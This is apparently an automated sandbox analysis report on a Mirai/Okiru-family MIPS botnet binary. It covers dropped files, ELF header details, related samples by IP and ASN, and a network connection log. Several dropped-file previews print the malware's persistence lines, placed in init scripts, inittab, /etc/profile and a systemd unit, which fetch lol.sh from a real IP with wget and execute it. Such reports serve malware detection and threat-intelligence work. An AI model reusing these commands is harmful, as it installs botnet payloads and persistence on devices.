109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
AMAZON-02US	5935c1f1a7da8e42028da77013b80635afdd605866569.exe	Get hash	malicious	Unknown	Browse	18.167.52.240
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	18.238.49.124
	http://www.finanzamthessen.de	Get hash	malicious	Unknown	Browse	54.75.69.192
	installer.bat	Get hash	malicious	Vidar	Browse	108.139.47.108
	din.exe	Get hash	malicious	Vidar	Browse	18.238.49.74
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	54.126.82.77
	RpcSecurity.mips.elf	Get hash	malicious	Unknown	Browse	54.217.10.153
	RpcSecurity.x86_64.elf	Get hash	malicious	Unknown	Browse	34.243.160.129
	feiwbps.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	most-mips.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
INIT7CH	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	bin.sh.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	mipsel.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
NETIXBG	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	128
Entropy (8bit):	4.621152284656322
Encrypted:	false
SSDEEP:	3:KPJRXaw/iFDDoCvLdjX43LbaaFOdFXa5O:WJRl/mfoYZX47baaeXCO
MD5:	1D55BE36F78D969AB0C4D8B5EE319996
SHA1:	AA3A40D0BBDB28B9A59E5276878A5599912ED21E
SHA-256:	2E5C3D0543F1C5114BAD8BFB6410EA0E43C880C6B8FA65A2D611245689361A08
SHA-512:	32F95FF692C11A1759FF6DEEDA2418DEC0CC96EC8CEC653D789507683525B6B7E7794F89C1B8066C5CE226B39A3A5A9612A1D63A2F6FDB26F64F2DCED67510FA
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/mipsel.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/mipsel.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	416
Entropy (8bit):	4.512585355914976
Encrypted:	false
SSDEEP:	12:QRkio/MXNxuw/0/eKUJgjvMbw/6FxH/MuKN+dRRucSOyd3:b/2/0/e1Ix/ul/3YOM3
MD5:	841CED445EB662D431598175C7304B23
SHA1:	7CE667F5164A5F7D4F3EA2ECF908167F6F1F4AC7
SHA-256:	AB92589C743D258E40786E20D1C36F207722E554D9BCA3F380962061EBE43C4C
SHA-512:	027C04462228622FD156C4A930309D5B39B6DE179AE77F933BDD9CB01D3FA644537B37F8533487AE202CEF97D92611AA3B7CFD05426BDAE5C82CDA80644A2DB7
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/mipsel.nn.elf..case "" in. start). echo 'Starting mipsel.nn.elf'. /tmp/mipsel.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping mipsel.nn.elf'. killall mipsel.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	115
Entropy (8bit):	4.5666452107088995
Encrypted:	false
SSDEEP:	3:TKH4vZKaw/iFDvSDRFiLdjX43LpaKB0dFLoKE0:h8l/mzSXoZX47zBeLXE0
MD5:	38EEA4430DB2D00F84A3DFE42720B5D5
SHA1:	33D5C7E92F5F93853E70DF0F588542DB26258740
SHA-256:	D50551543C22734DC556F09AA272552154AC73B4BBCB871DCA33F0D704E52095
SHA-512:	E2265F527FA3CF4F022F833C9B7206D0C8E7726F7A81F782C3E42B4DBCC0F91BC34372E4262C37F7B5D64AB63A161FB4622B15D43AD2D0012FD810BA2C78AB61
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/mipsel.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	120
Entropy (8bit):	4.5438681083202725
Encrypted:	false
SSDEEP:	3:nAWu5Iw/iFDDoCvLdjX43LbaaFOdFXa5O:AN/mfoYZX47baaeXCO
MD5:	70DA4E06E79A4ED650DAD2F2E715CCBF
SHA1:	C6AE5F166CE62B682FCFC23D12D84AFE4A024255
SHA-256:	E246C2104D95E8872F5A6359AD3384B130DDC71CFE147E428DFC2B553B26A96B
SHA-512:	D872B4559BCDCFCFC8CCE3327ED52BDD6327CDAE2E15B999EBF20FBB27997C4511012D4A020911156C1CDA84D95A5587C7AD8DE8441B05E34441C097BBCEE2EB
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/mipsel.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.4383721321643135
Encrypted:	false
SSDEEP:	3:Tgaw/iFDvSDRFiLdjX43LbaaFOdFXa50:Tgl/mzSXoZX47baaeXC0
MD5:	E220DC4E76A064B6ED8141D23D1BDCE0
SHA1:	643CB77DA694D4073842D324D1E7057A00ED0313
SHA-256:	85BEA3E9402FCBDE0D6E496402A5565B240984FE34246EA78EEB9A62BACD6B16
SHA-512:	93BE3FAC82B52F54CB296F3F14488788D3AF64F95FE0A7DCF8B947E123C9587470270CBB0BFAC5BDA6D35D5839F02DF5B9DEDA6436983A579A15E8F6444BA9E4
Malicious:	true
Reputation:	low
Preview:	/tmp/mipsel.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: sparc.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: arm7.nn-20241224-0652.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.035426450630189
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+5/M02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+5/Mp+GWRkKY+GWRXY+GWRr
MD5:	2A73B86BC1DA4466DA3DBC3017B56B59
SHA1:	6800C264848CB99E25E246E47A4884FAF93184DB
SHA-256:	428A855C8F22DF1CA59255BED3B06CF8FA79E63E4986C63FAFF0D070AC0CAC87
SHA-512:	1E9CC79ED7B4DF5B0AC7F98FA1C1929B7CDDC5A5F52A7D3C13A546D08B9CC053EE8DFCC70061FD516A2C228D264A64A590BC9CB3EFBC950A56A7508C7FE0A3DC
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/mipsel.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.9AgHYw (deleted)

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.5110854081804286
Encrypted:	false
SSDEEP:	3:Tgaw/iln:Tgl/Gn
MD5:	E161F2EC9C1A693BE77DD848C5A17087
SHA1:	C6DC3683D6AF6B3AD69F1E155638994278FD3DC9
SHA-256:	6EC0A33B73DE74EBEB61B23D54BFF44B920A3F994E0781781253974DB671921F
SHA-512:	79FEC2E25B4E40804C09089CDAC6D8A9C2FE0F90D096D6DEF3DE458D572EBE6D18740670BA9F33B45DAA80D4104252ECAAB075B44D5ED9BEDF8C5644DB302145
Malicious:	false
Preview:	/tmp/mipsel.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.593371955185826
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mipsel.nn.elf
File size:	118'656 bytes
MD5:	33e5b401b700dae33dbc37662d7dafee
SHA1:	57803abe6b1285e80bd503be667d09e1fc9b455a
SHA256:	865a14586914aecae92b653fe2d2ccaab5d525460dd1b9ce421f152b86f41a4e
SHA512:	a83b2366e436015b288591b75397e31e0e9aa2e93d2633d00f6a6b2c2cb6562de0057ecbf5d1e7cf5c5441817c67c296281325457667177791bc291f86912220
SSDEEP:	1536:7ug4pue/7UMeFInD7QsNhyjmkPQBdFZQGaZR3JPTIT3PwG2:7opn/7J/rFZjaCTwG
TLSH:	FEC3F706BF610EF7E8ABCD374AAC170234CD984B12A96B363934D919F54F25B16E3C64
File Content Preview:	.ELF....................`.@.4...P.......4. ...(...............@...@...........................E...E.....\/..........Q.td...............................<.D.'!......'.......................<.D.'!... .........9'.. ........................<xD.'!........... .9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	118096
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x19170	0x0	0x6	AX	16
.fini	PROGBITS	0x419290	0x19290	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x4192f0	0x192f0	0x26a0	0x0	0x2	A	16
.ctors	PROGBITS	0x45c000	0x1c000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45c008	0x1c008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x45c014	0x1c014	0x54	0x0	0x3	WA	4
.data	PROGBITS	0x45c070	0x1c070	0x500	0x0	0x3	WA	16
.got	PROGBITS	0x45c570	0x1c570	0x77c	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x45ccec	0x1ccec	0x20	0x0	0x10000003	WAp	4
.bss	NOBITS	0x45cd10	0x1ccec	0x224c	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xe10	0x1ccec	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x1ccec	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1b990	0x1b990	5.6675	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x1c000	0x45c000	0x45c000	0xcec	0x2f5c	4.1490	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:17:42.807923079 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:17:43.571868896 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:43.692554951 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:43.692661047 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:43.693953991 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:43.816263914 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:44.239768982 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:44.519639969 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:44.854449034 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:44.854520082 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:45.244556904 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:45.364252090 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:45.364406109 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:45.364406109 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:45.484271049 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:45.891448975 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:46.051657915 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:46.583359957 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:46.583656073 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:46.897984028 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:47.018567085 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:47.018656969 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:47.018783092 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:47.139056921 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:47.541979074 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:47.703644991 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:48.163228035 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:48.163336992 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:48.183203936 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:17:48.544718027 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:48.664470911 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:48.664542913 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:48.664608955 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:48.784169912 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:49.264306068 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:49.431642056 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:49.877336979 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:49.877434969 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:49.974905014 CET	42516	80	192.168.2.23	109.202.202.202
Dec 27, 2024 09:17:50.265713930 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:50.637833118 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:50.637907982 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:50.637981892 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:50.757415056 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:51.205718994 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:51.367768049 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:51.847373962 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:51.847449064 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:52.207056999 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:52.326823950 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:52.326914072 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:52.326945066 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:52.446629047 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:52.830558062 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:52.991904020 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:53.448091984 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:53.448174953 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:53.831789017 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:53.951467991 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:53.951760054 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:53.951760054 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:54.071461916 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:54.454791069 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:54.615873098 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:55.128530025 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:55.128705025 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:55.455641031 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:55.575901985 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:55.576066971 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:55.576092958 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:55.696356058 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:56.079729080 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:56.243771076 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:56.773252964 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:56.773442984 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:57.080562115 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:57.201617002 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:57.201838970 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:57.201864958 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:57.321434021 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:57.706279039 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:57.867870092 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:58.411540985 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:58.411814928 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:58.707178116 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:58.826725006 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:58.826894999 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:58.826894999 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:58.946544886 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:59.330842018 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:17:59.491769075 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:59.977932930 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:17:59.978240013 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:00.331808090 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:00.451495886 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:00.451618910 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:00.451664925 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:00.573468924 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:00.956758022 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:01.119937897 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:01.609133959 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:01.609360933 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:01.957760096 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:02.077446938 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:02.077596903 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:02.077630997 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:02.197230101 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:02.581763029 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:02.743767023 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:02.773283005 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:18:03.266305923 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:03.266536951 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:03.582971096 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:03.702541113 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:03.702641010 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:03.702800035 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:03.822235107 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:04.206479073 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:04.367712975 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:04.881900072 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:04.882010937 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:05.207319021 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:05.327075958 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:05.327174902 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:05.327200890 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:18:05.446984053 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:18:05.830729008 CET	60030	38242	192.168.2.23	94.156.227.234
